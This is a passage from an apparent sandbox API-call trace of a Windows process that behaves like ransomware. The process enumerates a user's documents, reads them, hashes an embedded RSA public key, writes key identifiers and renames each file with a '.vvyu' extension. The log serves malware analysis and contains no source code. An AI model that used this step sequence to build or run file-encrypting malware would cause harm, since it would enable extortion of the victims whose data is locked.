lpOverlapped=0x0) returned 1 [0196.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.490] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.490] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.490] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.491] CloseHandle (hObject=0x568) returned 1 [0196.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.493] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Qs2 hK9Y_.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\qs2 hk9y_.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Qs2 hK9Y_.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\qs2 hk9y_.xlsx.vvyu")) returned 1 [0196.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.495] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.498] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa778bd90, ftCreationTime.dwHighDateTime=0x1d8a387, ftLastAccessTime.dwLowDateTime=0xdd6ea820, ftLastAccessTime.dwHighDateTime=0x1d8a408, ftLastWriteTime.dwLowDateTime=0xdd6ea820, ftLastWriteTime.dwHighDateTime=0x1d8a408, nFileSizeHigh=0x0, nFileSizeLow=0x18588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r FiXNL1vU2.ots", cAlternateFileName="RFIXNL~1.OTS")) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.498] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\r FiXNL1vU2.ots") returned=".ots" [0196.498] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\r FiXNL1vU2.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\r fixnl1vu2.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.499] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=99720) returned 1 [0196.499] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.502] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18562, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.502] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.505] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.505] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18588, lpOverlapped=0x0) returned 1 [0196.506] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.507] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.508] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.508] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.508] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.508] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.508] GetLastError () returned 0x0 [0196.508] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.508] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.509] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.509] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.509] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18590) returned 0x2ea79b0 [0196.509] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1848 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1890 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.510] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ea0 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0196.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.514] GetCurrentThreadId () returned 0x66c [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5410 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.514] GetCurrentThreadId () returned 0x66c [0196.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1890 | out: hHeap=0x620000) returned 1 [0196.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 